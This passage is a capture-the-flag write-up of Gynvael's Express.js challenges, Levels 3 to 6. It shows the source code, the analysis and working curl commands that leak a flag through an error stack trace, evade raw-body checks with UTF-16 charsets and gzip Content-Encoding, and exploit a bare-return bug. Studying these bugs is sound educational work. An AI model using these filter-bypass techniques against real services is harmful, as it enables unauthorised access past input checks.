Supply an invalid path parameter (e.g. %) to make Express return the exception stack trace, thereby leaking the file path of the script and hence obtaining the flag:

$ curl 'http://challenges.gynvael.stream:5003/truecolors/%'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>URIError: Failed to decode param &#39;%&#39;<br> &nbsp; &nbsp;at decodeURIComponent (&lt;anonymous&gt;)<br> &nbsp; &nbsp;at decode_param (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:172:12)<br> &nbsp; &nbsp;at Layer.match (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:148:15)<br> &nbsp; &nbsp;at matchLayer (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:574:18)<br> &nbsp; &nbsp;at next (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:220:15)<br> &nbsp; &nbsp;at expressInit (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/middleware/init.js:40:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:284:7<br> &nbsp; &nbsp;at Function.process_params (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:335:12)</pre>
</body>
</html>

Flag:: CTF{TurnsOutItsNotRegexFault}


Level 4

Problem

Target: http://challenges.gynvael.stream:5004
https://twitter.com/gynvael/status/1260499214225809409

const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5004
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.use(express.text({
  verify: (req, res, body) => {
    const magic = Buffer.from('ShowMeTheFlag')

    if (body.includes(magic)) {
      throw new Error("Go away.")
    }
  }
}))

app.post('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  if ((typeof req.body) !== 'string') {
    res.end("What?")
    return
  }

  if (req.body.includes('ShowMeTheFlag')) {
    res.end(FLAG)
    return
  }

  res.end("Say the magic phrase!")
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 4\n\n")
  res.end(SOURCE)
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Looking at the verify function, we see that there is a body.includes(magic) check we need to evade (the request is rejected if the raw body contains the magic bytes), while req.body.includes('ShowMeTheFlag') must still return true in the /flag endpoint POST handler.

According to Express’ documentation for express.text(), we see that the verify option is invoked as verify(req, res, buf, encoding), where buf is a Buffer of the raw request body and encoding is the encoding of the request.

This means that the body parameter passed to the verify function has not yet been decoded from the charset specified by the client. Notice that body.includes(magic) implicitly assumes the raw request body is ASCII/UTF-8, since it does not decode the body into a common encoding before performing the check.
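A quick Node sketch of the mismatch (body-parser decodes the body with iconv-lite only after verify has run):

// UTF-16LE interleaves NUL bytes, so a byte-level search for the ASCII
// magic string fails, yet decoding yields the magic string again:
const raw = Buffer.from('ShowMeTheFlag', 'utf16le')
console.log(raw.includes(Buffer.from('ShowMeTheFlag'))) // false
console.log(raw.toString('utf16le'))                    // 'ShowMeTheFlag'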

Solution

The solution is simple – use a different charset that uses multibyte characters, e.g. utf-16, utf-16le, utf-16be, and encode the constant string ShowMeTheFlag in the charset specified:

$ curl -H 'Content-Type: text/plain;charset=utf-16' --data-binary @<(python -c "print 'ShowMeTheFlag'.encode('utf-16')") 'http://challenges.gynvael.stream:5004/flag'

CTF{||ButVerify()WasSupposedToProtectUs!||}

Flag:: CTF{||ButVerify()WasSupposedToProtectUs!||}


Level 5

Problem

Target: http://challenges.gynvael.stream:5005
https://twitter.com/gynvael/status/1262434816714313729

const http = require('http')
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5005
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.use(express.urlencoded({extended: false}))

app.post('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  if (req.body.secret !== 'ShowMeTheFlag') {
    res.end("Say the magic phrase!")
    return
  }

  if (req.youAreBanned) {
    res.end("How about no.")
    return
  }

  res.end(FLAG)
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 5\n\n")
  res.end(SOURCE)
})

const proxy = function(req, res) {
  req.youAreBanned = false
  let body = ''
  req
    .prependListener('data', (data) => { body += data })
    .prependListener('end', () => {
      const o = new URLSearchParams(body)
      req.youAreBanned = o.toString().includes("ShowMeTheFlag")
    })
  return app(req, res)
}

const server = http.createServer(proxy)
server.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

We can observe that the code above is similar to that of Level 4, with some changes.

The first change is the use of app.use(express.urlencoded({extended: false})) instead of app.use(express.text(...)). The second is the use of http.createServer(proxy) to inspect the raw request body before it is passed to Express, instead of using the verify option.

Similar to Level 4, req.youAreBanned = o.toString().includes("ShowMeTheFlag") assumes the charset encoding of the request body when performing the check.

But when we try the same charset trick as in Level 4, we get an error:

$ curl -H 'Content-Type: application/x-www-form-urlencoded; charset=utf-16le' --data-binary @<(python -c "print 'secret=ShowMeTheFlag'.encode('utf-16le')") 'http://challenges.gynvael.stream:5005/flag'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>UnsupportedMediaTypeError: unsupported charset &quot;UTF-16LE&quot;<br> &nbsp; &nbsp;at urlencodedParser (/usr/src/app/node_modules/body-parser/lib/types/urlencoded.js:108:12)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/node_modules/express/lib/router/index.js:284:7<br> &nbsp; &nbsp;at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)<br> &nbsp; &nbsp;at next (/usr/src/app/node_modules/express/lib/router/index.js:275:10)<br> &nbsp; &nbsp;at expressInit (/usr/src/app/node_modules/express/lib/middleware/init.js:40:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/node_modules/express/lib/router/index.js:284:7</pre>
</body>
</html>

This is because express.urlencoded (urlencoded in body-parser) asserts that the charset for Content-Type: application/x-www-form-urlencoded is utf-8. So, it is not possible to specify any other charset encoding.

Solution

Speaking of encoding, there’s one more thing we have yet to try – Content-Encoding.

Recall that the raw request body is not decoded before being checked in proxy(). This means we can compress the contents (e.g. with gzip) and send a Content-Encoding: gzip header: proxy() then sees only the gzip-compressed bytes (passing the first check), while Express decompresses the body before handing it to the /flag endpoint POST handler, which then correctly sees secret=ShowMeTheFlag. A quick Node sketch (not part of the challenge code) illustrates both halves:
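// proxy() only ever sees the compressed bytes:
const zlib = require('zlib')
const compressed = zlib.gzipSync('secret=ShowMeTheFlag')
console.log(compressed.includes('ShowMeTheFlag'))   // false
// body-parser inflates gzip/deflate-encoded bodies by default before parsing:
console.log(zlib.gunzipSync(compressed).toString()) // 'secret=ShowMeTheFlag'

And the actual request: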

$ curl -H 'Content-Encoding: gzip' --data-binary @<(printf 'secret=ShowMeTheFlag' | gzip) 'http://challenges.gynvael.stream:5005/flag'
CTF{||SameAsLevel4ButDifferent||}

Flag:: CTF{||SameAsLevel4ButDifferent||}


Level 6

Problem

Target: http://challenges.gynvael.stream:5006
https://twitter.com/gynvael/status/1264504663791058945

const http = require('http')
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5006
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

const checkSecret = (secret) => {
  return
    [
      secret.split("").reverse().join(""),
      "xor",
      secret.split("").join("-")
    ].join('+')
}

app.get('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  if (!req.query.secret1 || !req.query.secret2) {
    res.end("You are not even trying.")
    return
  }

  if (`<${checkSecret(req.query.secret1)}>` === req.query.secret2) {
    res.end(FLAG)
    return
  }

  res.end("Lul no.")
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 6\n\n")
  res.end(SOURCE)
})

app.listen(PORT, () => {
  console.log(`Example app listening at port ${PORT}`)
})

Analysis

Notice that checkSecret has a bare return keyword, with the value it was supposed to return on the following lines.
This is a common mistake made when coding in JavaScript. In JavaScript, automatic semicolon insertion (ASI) is performed on certain statements, such as return, that must be terminated with a semicolon.

As a result, a semicolon is automatically inserted right after the return keyword, before the newline:

const checkSecret = (secret) => {
  return; // ASI performed here; below lines are ignored
    [
      secret.split("").reverse().join(""),
      "xor",
      secret.split("").join("-")
    ].join('+')
}

This means that effectively, undefined is being returned by the checkSecret arrow function expression.
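A minimal reproduction of the pitfall:

// ASI terminates the bare return, so the array expression below is
// unreachable and the function returns undefined:
const checkSecret = (secret) => {
  return
    [secret, 'xor'].join('+')
}
console.log(`<${checkSecret('a')}>`) // prints: <undefined>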

Solution

To pass the checks, we simply set the secret1 query string parameter to any non-empty value, and secret2 to <undefined>:

$ curl 'http://challenges.gynvael.stream:5006/flag?secret1=a&secret2=<undefined>'

CTF{||RevengeOfTheScript||}

Flag:: CTF{||RevengeOfTheScript||}